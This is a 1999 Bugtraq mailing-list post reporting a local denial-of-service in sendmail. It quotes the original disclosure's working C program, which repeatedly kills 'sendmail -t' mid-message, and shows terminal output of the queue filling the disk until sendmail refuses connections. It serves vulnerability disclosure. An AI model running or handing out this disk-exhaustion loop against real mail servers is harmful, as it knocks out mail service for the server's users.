Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Possible local DoS in sendmail

From: kuruption () CHA0S COM (KuRuPTioN)
Date: Thu, 1 Apr 1999 14:41:41 -0500

Well, this is very interesting... this is what I found my running this
binary for 30 seconds =)

Before:

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251   87681   199909     30%   /
# ps auwx | grep sendmail
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#

After (30 seconds running):

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  107548   180042     37%   /
(not too bad but another 30 seconds later another df)

Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  146235   141355     51%   /

# ps auwx | grep sendmail
mail     17144 70.5  0.4  1348   820  p1 R   11:35   0:48
/usr/sbin/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
accepting connections on port 25
(sendmail kindly using 70% of my CPU)

# ls -l /var/spool/mqueue
total 115854
-rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 qfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 xfLAA17144

(once again a df)
# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  224734    62856     78%   /

and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  287590        0    100%   /
# ps auwx | grep sendmail
mail     17144 68.5  0.4  1348   820  p1 R   11:35   2:33
/usr/wrapped/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
rejecting connections on port 25: min free: 100
#

People, this is no april fools joke =)

Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgp@24.3.181.22

|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQ () NETSPACE ORG]On Behalf Of Lukasz
|Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQ () NETSPACE ORG
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail ran with -t option does NOT block SIGINT ...
|In that moment while we are sending data to its stdin, when we will press
|CTRL-C process is being killed, but in queue rests unfinished letter.
|It stays there quite long - long enought to fullfill partition on
|disk where
|/var/spool/mqueue resides.
|When it happends, sendmail doesn't allow new connections - so it is a kind
|of DoS attack for this service.
|It has been tested on all new versions on sendmail up to current (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/wait.h>
|
| #define DELAY 5              /* time in seconds needed to reach
|                                 MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| void main()
| {
|       FILE    *fd;
|       int     pid;
|
|       for(;;) {
|               if(( pid = fork()) == 0) {
|                       setpgrp();
|                       if(( fd = popen( SM_PATH, "w")) == NULL)
|                               fprintf( stderr, "popen error\n");
|
|                       for(;;) fputc( 'A', fd);
|               } else {
|                       sleep( DELAY);
|                       kill( (-1) * pid, SIGINT);
|                       fprintf( stdout, "next\n");
|                       wait( NULL);
|               }
|       }
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar                               K.K.I.
|http://noname.kki.krakow.pl/           lluzar () kki pl
|
Previous By Date Next
Previous By Thread Next

Current thread: